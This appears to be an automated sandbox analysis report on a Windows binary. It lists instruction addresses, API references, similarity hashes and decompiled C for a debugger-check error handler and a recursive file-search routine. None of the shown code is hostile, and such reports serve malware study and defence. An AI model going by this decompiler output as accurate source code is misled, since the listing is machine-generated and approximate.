                                            0x00c327ca
                                            0x00c327cc
                                            0x00c327cc
                                            0x00c327ca
                                            0x00c327c5
                                            0x00c327c0
                                            0x00c327fa
                                            0x00c32800
                                            0x00c32806
                                            0x00c32809
                                            0x00c3280f
                                            0x00c32812
                                            0x00c3281d
                                            0x00c32820
                                            0x00c32821
                                            0x00c32824
                                            0x00c32844
                                            0x00c3284a
                                            0x00c32850
                                            0x00c32853
                                            0x00c32859
                                            0x00c3285c
                                            0x00c3285f
                                            0x00c32f78
                                            0x00c32f80
                                            0x00c32f87
                                            0x00c32f8e
                                            0x00c32f9b
                                            0x00c32fad
                                            0x00c32fb2
                                            0x00c32fb8
                                            0x00c32fca
                                            0x00c32fd0
                                            0x00c32fdd
                                            0x00c32fea
                                            0x00c32ff7
                                            0x00c32ffd
                                            0x00c32fff
                                            0x00c3300c
                                            0x00c3300e
                                            0x00c3300e
                                            0x00c3300f
                                            0x00c3300f
                                            0x00c3301b
                                            0x00c3302b
                                            0x00c3302b
                                            0x00c3302e
                                            0x00c33034
                                            0x00c3303a
                                            0x00c3303c
                                            0x00c3303d
                                            0x00c33042
                                            0x00c3304a
                                            0x00c33050
                                            0x00c330d9
                                            0x00c330dc
                                            0x00000000
                                            0x00c330dc
                                            0x00c33056
                                            0x00c3305c
                                            0x00c3305f
                                            0x00000000
                                            0x00000000
                                            0x00c33061
                                            0x00c33064
                                            0x00000000
                                            0x00000000
                                            0x00c33066
                                            0x00c33069
                                            0x00c330ab
                                            0x00c330b2
                                            0x00c330b9
                                            0x00c330be
                                            0x00c330c2
                                            0x00000000
                                            0x00000000
                                            0x00c330cb
                                            0x00c330d0
                                            0x00000000
                                            0x00c330d0
                                            0x00c3306b
                                            0x00c33072
                                            0x00000000
                                            0x00000000
                                            0x00c3307f
                                            0x00c3307f
                                            0x00c33082
                                            0x00c33088
                                            0x00c3308b
                                            0x00c3308f
                                            0x00c33091
                                            0x00c33098
                                            0x00c3309c
                                            0x00c3309f
                                            0x00c330a2
                                            0x00c330a2
                                            0x00c330a2
                                            0x00c330a7
                                            0x00c330a9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c330a9
                                            0x00c33001
                                            0x00c33003
                                            0x00c3300a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c3300a
                                            0x00c32865
                                            0x00c32f4e
                                            0x00c32f4e
                                            0x00c32f58
                                            0x00c32f66
                                            0x00c32f6c
                                            0x00c32f6c
                                            0x00000000
                                            0x00c32f58
                                            0x00c3286b
                                            0x00c3286e
                                            0x00c32902
                                            0x00c3290a
                                            0x00c32919
                                            0x00c3291d
                                            0x00c32920
                                            0x00c32927
                                            0x00c32930
                                            0x00c32932
                                            0x00c32936
                                            0x00c3293c
                                            0x00c32941
                                            0x00c3294d
                                            0x00c3295a
                                            0x00c32967
                                            0x00c3296d
                                            0x00c32970
                                            0x00c3297d
                                            0x00c3297d
                                            0x00c3297d
                                            0x00c3297f
                                            0x00c32981
                                            0x00c32981
                                            0x00c32987
                                            0x00c3298a
                                            0x00c32996
                                            0x00c32996
                                            0x00c32998
                                            0x00c32998
                                            0x00c329a3
                                            0x00c329a5
                                            0x00c329aa
                                            0x00c329b0
                                            0x00c329b6
                                            0x00c329bf
                                            0x00c329cf
                                            0x00c329cf
                                            0x00c329b8
                                            0x00c329b8
                                            0x00c329ba
                                            0x00c329ba
                                            0x00c329d1
                                            0x00c329e7
                                            0x00c329ed
                                            0x00c329fb
                                            0x00c32a06
                                            0x00c32a11
                                            0x00c32a14
                                            0x00c32a26
                                            0x00c32a34
                                            0x00c32a3f
                                            0x00c32a4f
                                            0x00c32a5d
                                            0x00c32a60
                                            0x00c32a65
                                            0x00c32a68
                                            0x00c32a6b
                                            0x00c32a6e
                                            0x00c32a71
                                            0x00c32a73
                                            0x00c32a75
                                            0x00c32a77
                                            0x00c32a77
                                            0x00c32a75
                                            0x00c32a80
                                            0x00c32a86
                                            0x00c32a8c
                                            0x00c32ad1
                                            0x00c32ad1
                                            0x00c32ad4
                                            0x00c32ade
                                            0x00c32ae0
                                            0x00c32af2
                                            0x00c32af2
                                            0x00c32afc
                                            0x00c32afc
                                            0x00c32b02
                                            0x00c32b04
                                            0x00c32b0e
                                            0x00c32b13
                                            0x00c32b15
                                            0x00c32b17
                                            0x00c32b21
                                            0x00c32b21
                                            0x00c32b13
                                            0x00c32b28
                                            0x00c32b2b
                                            0x00c32b37
                                            0x00c32b37
                                            0x00000000
                                            0x00c32b2d
                                            0x00c32b2d
                                            0x00c32b30
                                            0x00000000
                                            0x00000000
                                            0x00c32b34
                                            0x00c32b39
                                            0x00c32b39
                                            0x00c32b45
                                            0x00c32b45
                                            0x00c32b47
                                            0x00c32b4d
                                            0x00c32b7b
                                            0x00c32b7f
                                            0x00c32b81
                                            0x00c32b83
                                            0x00c32b83
                                            0x00c32b83
                                            0x00c32b86
                                            0x00c32b86
                                            0x00c32b91
                                            0x00c32b97
                                            0x00c32b9e
                                            0x00c32ba4
                                            0x00c32ba6
                                            0x00c32bac
                                            0x00c32bb3
                                            0x00c32bb9
                                            0x00c32bc0
                                            0x00c32bc6
                                            0x00c32bc6
                                            0x00c32bcc
                                            0x00c32bcf
                                            0x00c32bd4
                                            0x00c32bd7
                                            0x00c32bd9
                                            0x00c32bdb
                                            0x00c32bdd
                                            0x00c32bdd
                                            0x00c32beb
                                            0x00c32bf0
                                            0x00c32bf2
                                            0x00c32bf6
                                            0x00c32bfd
                                            0x00c32c7e
                                            0x00c32c88
                                            0x00c32c93
                                            0x00c32c96
                                            0x00c32c9d
                                            0x00c32c9f
                                            0x00c32c9f
                                            0x00c32c9f
                                            0x00c32ca2
                                            0x00c32ca4
                                            0x00c32da6
                                            0x00c32caa
                                            0x00c32cb3
                                            0x00c32cb6
                                            0x00c32cc5
                                            0x00c32ccf
                                            0x00c32cd3
                                            0x00c32cda
                                            0x00c32cdc
                                            0x00c32ce2
                                            0x00c32ce9
                                            0x00c32cf2
                                            0x00c32cf8
                                            0x00c32cf9
                                            0x00c32d05
                                            0x00c32d09
                                            0x00c32d0f
                                            0x00c32d11
                                            0x00c32d19
                                            0x00c32d1f
                                            0x00c32d21
                                            0x00c32d2b
                                            0x00c32d2d
                                            0x00c32d38
                                            0x00c32d40
                                            0x00c32d5d
                                            0x00c32d6d
                                            0x00c32d73
                                            0x00c32d76
                                            0x00c32d81
                                            0x00c32d89
                                            0x00c32d8e
                                            0x00c32d91
                                            0x00c32d94
                                            0x00c32d97
                                            0x00c32d99
                                            0x00c32d9b
                                            0x00c32d9e
                                            0x00c32d9e
                                            0x00c32d99
                                            0x00c32ce9
                                            0x00c32cdc
                                            0x00c32daf
                                            0x00c32db6
                                            0x00c32db8
                                            0x00c32dba
                                            0x00c32dba
                                            0x00c32bff
                                            0x00c32c01
                                            0x00c32c04
                                            0x00c32c07
                                            0x00c32c0e
                                            0x00c32c13
                                            0x00c32c1f
                                            0x00c32c24
                                            0x00c32c27
                                            0x00c32c29
                                            0x00c32c2b
                                            0x00c32c3e
                                            0x00c32c48
                                            0x00c32c48
                                            0x00c32c4d
                                            0x00c32c4d
                                            0x00c32c4d
                                            0x00c32c4f
                                            0x00c32c52
                                            0x00c32c54
                                            0x00c32c56
                                            0x00c32c5b
                                            0x00c32c62
                                            0x00c32c63
                                            0x00c32c63
                                            0x00c32c6b
                                            0x00c32c6b
                                            0x00c32dc1
                                            0x00c32dc8
                                            0x00c32dd6
                                            0x00c32dd6
                                            0x00c32de4
                                            0x00c32de9
                                            0x00c32df0
                                            0x00c32ed4
                                            0x00c32ef5
                                            0x00c32efe
                                            0x00c32f0a
                                            0x00c32f10
                                            0x00c32f18
                                            0x00c32f1a
                                            0x00c32f27
                                            0x00c32f2e
                                            0x00c32f33
                                            0x00c32f37
                                            0x00c32f44
                                            0x00c32f44
                                            0x00c32f37
                                            0x00000000
                                            0x00c32df6
                                            0x00c32df9
                                            0x00c32e07
                                            0x00c32e10
                                            0x00c32e19
                                            0x00c32e1c
                                            0x00c32e1e
                                            0x00c32e20
                                            0x00c32e23
                                            0x00c32e25
                                            0x00c32e28
                                            0x00c32e2b
                                            0x00c32e2d
                                            0x00c32e35
                                            0x00c32e37
                                            0x00c32e3a
                                            0x00000000
                                            0x00000000
                                            0x00c32e40
                                            0x00c32e45
                                            0x00000000
                                            0x00000000
                                            0x00c32e47
                                            0x00c32e49
                                            0x00c32e58
                                            0x00c32e58
                                            0x00c32e65
                                            0x00c32e6a
                                            0x00c32e6d
                                            0x00c32e6f
                                            0x00c32e6f
                                            0x00c32e6f
                                            0x00c32e6f
                                            0x00c32e72
                                            0x00c32e74
                                            0x00c32e77
                                            0x00c32e77
                                            0x00c32e7a
                                            0x00c32eab
                                            0x00c32eab
                                            0x00c32eab
                                            0x00c32eb2
                                            0x00c32eb9
                                            0x00c32ebe
                                            0x00c32e7c
                                            0x00c32e7e
                                            0x00c32e81
                                            0x00c32e81
                                            0x00c32e84
                                            0x00c32e87
                                            0x00c32e89
                                            0x00c32e96
                                            0x00c32e98
                                            0x00c32e9e
                                            0x00c32ea0
                                            0x00c32ea3
                                            0x00c32ea3
                                            0x00c32ea3
                                            0x00c32ea8
                                            0x00000000
                                            0x00c32ea8
                                            0x00c32ec1
                                            0x00c32ec1
                                            0x00c32ec2
                                            0x00c32ec5
                                            0x00c32ec5
                                            0x00c32ece
                                            0x00c32ed1
                                            0x00000000
                                            0x00c32ed1
                                            0x00c32df0
                                            0x00c32b5a
                                            0x00c32b5c
                                            0x00c32b61
                                            0x00c32b65
                                            0x00c32b67
                                            0x00c32b75
                                            0x00c32b77
                                            0x00000000
                                            0x00c32b77
                                            0x00c32b69
                                            0x00c32b6c
                                            0x00000000
                                            0x00000000
                                            0x00c32b70
                                            0x00000000
                                            0x00c32b71
                                            0x00c32b2b
                                            0x00c32ae2
                                            0x00c32ae4
                                            0x00000000
                                            0x00000000
                                            0x00c32ae6
                                            0x00c32ae8
                                            0x00c32aea
                                            0x00c32aea
                                            0x00000000
                                            0x00c32a8e
                                            0x00c32a8e
                                            0x00c32a8e
                                            0x00c32a91
                                            0x00c32ac7
                                            0x00000000
                                            0x00c32ac7
                                            0x00c32a94
                                            0x00c32a94
                                            0x00c32a97
                                            0x00c32abb
                                            0x00000000
                                            0x00c32abb
                                            0x00c32a99
                                            0x00c32a99
                                            0x00c32a9c
                                            0x00c32aaf
                                            0x00c32aaf
                                            0x00000000
                                            0x00c32aaf
                                            0x00c32a9e
                                            0x00c32aa1
                                            0x00000000
                                            0x00000000
                                            0x00c32aa3
                                            0x00000000
                                            0x00c32aa3
                                            0x00c32a8c
                                            0x00c3298c
                                            0x00c3298f
                                            0x00000000
                                            0x00000000
                                            0x00c32993
                                            0x00000000
                                            0x00c32993
                                            0x00c32972
                                            0x00c32975
                                            0x00000000
                                            0x00c32977
                                            0x00c32977
                                            0x00c32979
                                            0x00000000
                                            0x00c32979
                                            0x00c32975
                                            0x00c32874
                                            0x00c32877
                                            0x00000000
                                            0x00c3287d
                                            0x00c32889
                                            0x00c32891
                                            0x00c32899
                                            0x00c328a8
                                            0x00c328b0
                                            0x00c328b3
                                            0x00c328b9
                                            0x00c328bf
                                            0x00c328c5
                                            0x00c328c7
                                            0x00c328d1
                                            0x00c328d1
                                            0x00c328d7
                                            0x00c328de
                                            0x00c328ec
                                            0x00c328ef
                                            0x00c328f5
                                            0x00c328f5
                                            0x00000000
                                            0x00c328de
                                            0x00c32877
                                            0x00c32814
                                            0x00c3281b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c3281b
                                            0x00c3280b
                                            0x00c3280b
                                            0x00000000
                                            0x00c327ac
                                            0x00c327ae
                                            0x00c330df
                                            0x00c330e2
                                            0x00c330f0
                                            0x00c330fb
                                            0x00c330fb
                                            0x00c327aa
                                            0x00c32746
                                            0x00c32748
                                            0x00000000
                                            0x00c32748
                                            0x00c326d6
                                            0x00c326d8
                                            0x00c326da
                                            0x00c326e0
                                            0x00000000
                                            0x00c326ec
                                            0x00c326ee
                                            0x00c326f2
                                            0x00c326fc
                                            0x00c326fe
                                            0x00c32707
                                            0x00000000
                                            0x00c32709
                                            0x00c32719
                                            0x00c3272a
                                            0x00c3272f
                                            0x00000000
                                            0x00c3272f
                                            0x00c32707

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00C3269B
                                            • _strlen.LIBCMT ref: 00C32C1F
                                              • Part of subcall function 00C40FDE: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00C3B312,00000000,?,?,?,001C0078), ref: 00C40FFA
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C32D76
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                            • String ID: CMT
                                            • API String ID: 1706572503-2756464174
                                            • Opcode ID: 7865e0601ba0e6c834668c0339bd238fe7c208579c7c2598162b4705572fadf3
                                            • Instruction ID: 49cea5f1868ea4d2778d80163dea85adaba89a48d7891057c1c369700baa4078
                                            • Opcode Fuzzy Hash: 7865e0601ba0e6c834668c0339bd238fe7c208579c7c2598162b4705572fadf3
                                            • Instruction Fuzzy Hash: 0C6227715202848FDF28DF74C895BEA3BE1EF54304F08457EED9A9B282DB719A44DB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C57BE1, Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 85%
                                            			E00C57BE1(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0xc6d668; // 0x13bcba52
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00C4E690(_t41);
					_pop(_t61);
				}
				E00C4E920(_t66,  &_v804, 0, 0x50);
				E00C4E920(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00C4E690(_t57);
				}
				return E00C4E203(_t57, _v8 ^ _t69);
			}




































                                            0x00c57be1
                                            0x00c57be1
                                            0x00c57be1
                                            0x00c57be1
                                            0x00c57bec
                                            0x00c57bf1
                                            0x00c57bf3
                                            0x00c57bfb
                                            0x00c57bfd
                                            0x00c57c00
                                            0x00c57c05
                                            0x00c57c05
                                            0x00c57c11
                                            0x00c57c24
                                            0x00c57c32
                                            0x00c57c38
                                            0x00c57c3e
                                            0x00c57c44
                                            0x00c57c4a
                                            0x00c57c50
                                            0x00c57c56
                                            0x00c57c5c
                                            0x00c57c62
                                            0x00c57c68
                                            0x00c57c6f
                                            0x00c57c76
                                            0x00c57c7d
                                            0x00c57c84
                                            0x00c57c8b
                                            0x00c57c92
                                            0x00c57c93
                                            0x00c57c9c
                                            0x00c57ca2
                                            0x00c57ca5
                                            0x00c57cab
                                            0x00c57cb8
                                            0x00c57cc1
                                            0x00c57cca
                                            0x00c57cd3
                                            0x00c57ce1
                                            0x00c57ce3
                                            0x00c57cf8
                                            0x00c57d04
                                            0x00c57d07
                                            0x00c57d0c
                                            0x00c57d1b

                                            APIs
                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00C57CD9
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00C57CE3
                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00C57CF0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                            • String ID:
                                            • API String ID: 3906539128-0
                                            • Opcode ID: fc1117189bb6fad0d51b64b20e17b721861be2e61fca9841fad93df1d120705a
                                            • Instruction ID: ce0a6334cbd66bcb1df138bec08678845bbd8b11314f8fb4d08aac79b2195162
                                            • Opcode Fuzzy Hash: fc1117189bb6fad0d51b64b20e17b721861be2e61fca9841fad93df1d120705a
                                            • Instruction Fuzzy Hash: 2D31D67490122CABCB21DF64D8887DCBBB8BF08310F5046DAE81CA7290E7709F858F44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C59FD3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 74%
                                            			E00C59FD3(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				union _FINDEX_INFO_LEVELS _t58;
				signed int _t62;
				signed int _t65;
				void* _t71;
				void* _t73;
				signed int _t74;
				void* _t77;
				CHAR* _t78;
				intOrPtr* _t82;
				intOrPtr _t84;
				void* _t86;
				intOrPtr* _t87;
				signed int _t91;
				signed int _t95;
				void* _t100;
				intOrPtr _t101;
				signed int _t104;
				union _FINDEX_INFO_LEVELS _t105;
				void* _t110;
				intOrPtr _t111;
				void* _t112;
				signed int _t117;
				void* _t118;
				signed int _t119;
				void* _t120;
				void* _t121;

				_push(__ecx);
				_t82 = _a4;
				_t2 = _t82 + 1; // 0x1
				_t100 = _t2;
				do {
					_t35 =  *_t82;
					_t82 = _t82 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t104 = _a12;
				_t84 = _t82 - _t100 + 1;
				_v8 = _t84;
				if(_t84 <= (_t35 | 0xffffffff) - _t104) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t104 + 1; // 0x1
					_t77 = _t5 + _t84;
					_t110 = E00C57B1B(_t84, _t77, 1);
					_pop(_t86);
					__eflags = _t104;
					if(_t104 == 0) {
						L6:
						_push(_v8);
						_t77 = _t77 - _t104;
						_t40 = E00C5DD71(_t86, _t110 + _t104, _t77, _a4);
						_t119 = _t118 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t71 = E00C5A212(_a16, _t100, __eflags, _t110);
							E00C57A50(0);
							_t73 = _t71;
							goto L8;
						}
					} else {
						_push(_t104);
						_t74 = E00C5DD71(_t86, _t110, _t77, _a8);
						_t119 = _t118 + 0x10;
						__eflags = _t74;
						if(_t74 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00C57DBB();
							asm("int3");
							_t117 = _t119;
							_t120 = _t119 - 0x150;
							_t43 =  *0xc6d668; // 0x13bcba52
							_v48 = _t43 ^ _t117;
							_t87 = _v32;
							_push(_t77);
							_t78 = _v36;
							_push(_t110);
							_t111 = _v332.cAlternateFileName;
							_push(_t104);
							_v372 = _t111;
							while(1) {
								__eflags = _t87 - _t78;
								if(_t87 == _t78) {
									break;
								}
								_t45 =  *_t87;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t87 = E00C5DDC0(_t78, _t87);
											continue;
										}
									}
								}
								break;
							}
							_t101 =  *_t87;
							__eflags = _t101 - 0x3a;
							if(_t101 != 0x3a) {
								L19:
								_t105 = 0;
								__eflags = _t101 - 0x2f;
								if(_t101 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t101 - 0x5c;
									if(_t101 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t101 - 0x3a;
										if(_t101 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t89 = _t87 - _t78 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t87 - _t78 + 0x00000001;
								E00C4E920(_t105,  &_v332, _t105, 0x140);
								_t121 = _t120 + 0xc;
								_t112 = FindFirstFileExA(_t78, _t105,  &_v332, _t105, _t105, _t105);
								_t55 = _v336;
								__eflags = _t112 - 0xffffffff;
								if(_t112 != 0xffffffff) {
									_t91 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t91;
									_t92 = _t91 >> 2;
									_v344 = _t91 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E00C59FD3(_t78, _t92, _t105, _t112,  &(_v332.cFileName), _t78, _v340);
											_t121 = _t121 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t92 = _v287;
											__eflags = _t92;
											if(_t92 == 0) {
												goto L37;
											} else {
												__eflags = _t92 - 0x2e;
												if(_t92 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t112,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t102 =  *_t55;
									_t95 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t95 - _t65;
									if(_t95 != _t65) {
										E00C55030(_t78, _t105, _t112, _t102 + _t95 * 4, _t65 - _t95, 4, E00C59E2B);
									}
								} else {
									_push(_t55);
									_t57 = E00C59FD3(_t78, _t89, _t105, _t112, _t78, _t105, _t105);
									L26:
									_t105 = _t57;
								}
								__eflags = _t112 - 0xffffffff;
								if(_t112 != 0xffffffff) {
									FindClose(_t112);
								}
								_t58 = _t105;
							} else {
								__eflags = _t87 -  &(_t78[1]);
								if(_t87 ==  &(_t78[1])) {
									goto L19;
								} else {
									_push(_t111);
									_t58 = E00C59FD3(_t78, _t87, 0, _t111, _t78, 0, 0);
								}
							}
							__eflags = _v12 ^ _t117;
							return E00C4E203(_t58, _v12 ^ _t117);
						} else {
							goto L6;
						}
					}
				} else {
					_t73 = 0xc;
					L8:
					return _t73;
				}
				L40:
			}
















































                                            0x00c59fd8
                                            0x00c59fd9
                                            0x00c59fdc
                                            0x00c59fdc
                                            0x00c59fdf
                                            0x00c59fdf
                                            0x00c59fe1
                                            0x00c59fe2
                                            0x00c59feb
                                            0x00c59fec
                                            0x00c59fef
                                            0x00c59ff2
                                            0x00c59ff7
                                            0x00c59ffe
                                            0x00c59fff
                                            0x00c5a000
                                            0x00c5a003
                                            0x00c5a00d
                                            0x00c5a010
                                            0x00c5a011
                                            0x00c5a013
                                            0x00c5a027
                                            0x00c5a027
                                            0x00c5a02a
                                            0x00c5a034
                                            0x00c5a039
                                            0x00c5a03c
                                            0x00c5a03e
                                            0x00000000
                                            0x00c5a040
                                            0x00c5a044
                                            0x00c5a04d
                                            0x00c5a053
                                            0x00000000
                                            0x00c5a056
                                            0x00c5a015
                                            0x00c5a015
                                            0x00c5a01b
                                            0x00c5a020
                                            0x00c5a023
                                            0x00c5a025
                                            0x00c5a05c
                                            0x00c5a05e
                                            0x00c5a05f
                                            0x00c5a060
                                            0x00c5a061
                                            0x00c5a062
                                            0x00c5a063
                                            0x00c5a068
                                            0x00c5a06c
                                            0x00c5a06e
                                            0x00c5a074
                                            0x00c5a07b
                                            0x00c5a07e
                                            0x00c5a081
                                            0x00c5a082
                                            0x00c5a085
                                            0x00c5a086
                                            0x00c5a089
                                            0x00c5a08a
                                            0x00c5a0ab
                                            0x00c5a0ab
                                            0x00c5a0ad
                                            0x00000000
                                            0x00000000
                                            0x00c5a092
                                            0x00c5a094
                                            0x00c5a096
                                            0x00c5a098
                                            0x00c5a09a
                                            0x00c5a09c
                                            0x00c5a09e
                                            0x00c5a0a9
                                            0x00000000
                                            0x00c5a0a9
                                            0x00c5a09e
                                            0x00c5a09a
                                            0x00000000
                                            0x00c5a096
                                            0x00c5a0af
                                            0x00c5a0b1
                                            0x00c5a0b4
                                            0x00c5a0cd
                                            0x00c5a0cd
                                            0x00c5a0cf
                                            0x00c5a0d2
                                            0x00c5a0e2
                                            0x00c5a0e4
                                            0x00c5a0e4
                                            0x00c5a0d4
                                            0x00c5a0d4
                                            0x00c5a0d7
                                            0x00000000
                                            0x00c5a0d9
                                            0x00c5a0d9
                                            0x00c5a0dc
                                            0x00000000
                                            0x00c5a0de
                                            0x00c5a0de
                                            0x00c5a0de
                                            0x00c5a0dc
                                            0x00c5a0d7
                                            0x00c5a0ea
                                            0x00c5a0f2
                                            0x00c5a0f6
                                            0x00c5a104
                                            0x00c5a109
                                            0x00c5a11e
                                            0x00c5a120
                                            0x00c5a126
                                            0x00c5a129
                                            0x00c5a15b
                                            0x00c5a15b
                                            0x00c5a15d
                                            0x00c5a160
                                            0x00c5a166
                                            0x00c5a166
                                            0x00c5a16d
                                            0x00c5a187
                                            0x00c5a187
                                            0x00c5a196
                                            0x00c5a19b
                                            0x00c5a19e
                                            0x00c5a1a0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c5a16f
                                            0x00c5a16f
                                            0x00c5a175
                                            0x00c5a177
                                            0x00000000
                                            0x00c5a179
                                            0x00c5a179
                                            0x00c5a17c
                                            0x00000000
                                            0x00c5a17e
                                            0x00c5a17e
                                            0x00c5a185
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c5a185
                                            0x00c5a17c
                                            0x00c5a177
                                            0x00000000
                                            0x00c5a1a2
                                            0x00c5a1aa
                                            0x00c5a1b0
                                            0x00c5a1b2
                                            0x00c5a1b2
                                            0x00c5a1ba
                                            0x00c5a1bf
                                            0x00c5a1c7
                                            0x00c5a1ca
                                            0x00c5a1cc
                                            0x00c5a1e0
                                            0x00c5a1e5
                                            0x00c5a12b
                                            0x00c5a12b
                                            0x00c5a12f
                                            0x00c5a137
                                            0x00c5a137
                                            0x00c5a137
                                            0x00c5a139
                                            0x00c5a13c
                                            0x00c5a13f
                                            0x00c5a13f
                                            0x00c5a145
                                            0x00c5a0b6
                                            0x00c5a0b9
                                            0x00c5a0bb
                                            0x00000000
                                            0x00c5a0bd
                                            0x00c5a0bd
                                            0x00c5a0c3
                                            0x00c5a0c8
                                            0x00c5a0bb
                                            0x00c5a14c
                                            0x00c5a157
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c5a025
                                            0x00c59ff9
                                            0x00c59ffb
                                            0x00c5a057
                                            0x00c5a05b
                                            0x00c5a05b
                                            0x00000000

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
